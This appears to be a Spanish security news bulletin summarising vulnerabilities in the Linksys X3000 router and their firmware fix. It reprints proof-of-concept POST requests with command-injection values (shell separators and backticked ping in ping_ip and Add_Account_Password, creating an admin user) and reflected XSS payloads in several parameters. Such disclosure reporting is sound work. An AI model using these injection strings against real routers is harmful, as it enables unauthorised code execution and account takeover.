Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Estás aquí: Inicio / Vulnerabilidades / Múltiples vulnerabilidades en router Linksys X3000

Múltiples vulnerabilidades en router Linksys X3000

Por Deja un comentario

El investigador de seguridad Michael Messner ha descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual.
Inyección de comandos
Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password. Las siguientes peticiones POST pueden servir como prueba de concepto:
  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=
  • Parámetro Add_Account_Password de la página User_Properties.asp:

command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin
Con estas peticiones conseguimos ejecutar en el sistema el comando ping.
XSS no persistente
También falta de validación en los parámetros ping_ip, sortby y submit_button.
  • Parámetro ping_ip de la página Diagnostics.asp:

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1′>alert(1)&ping_size=32&ping_times=5&traceroute_ip=
  • Parámetro sortby de la página DHCPTable.asp:

submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac»%3balert(1)//
  • Parámetro submit_button de la página WanMAC.asp:

submit_button=WanMAC’%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0
Estas vulnerabilidades han sido solucionas en el firmware v1.0.05 build 002 Feb 21,2013
Más información:
Linksys X3000 – Multiple Vulnerabilities
http://www.s3cur1ty.de/m1adv2013-019
Wireless-N ADSL 2+ Modem Router (X3000)
http://support.linksys.com/en-eu/support/linksys/X3000
Fernando Castillo

fcastillo@hispasec.com

Interacciones del lector

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.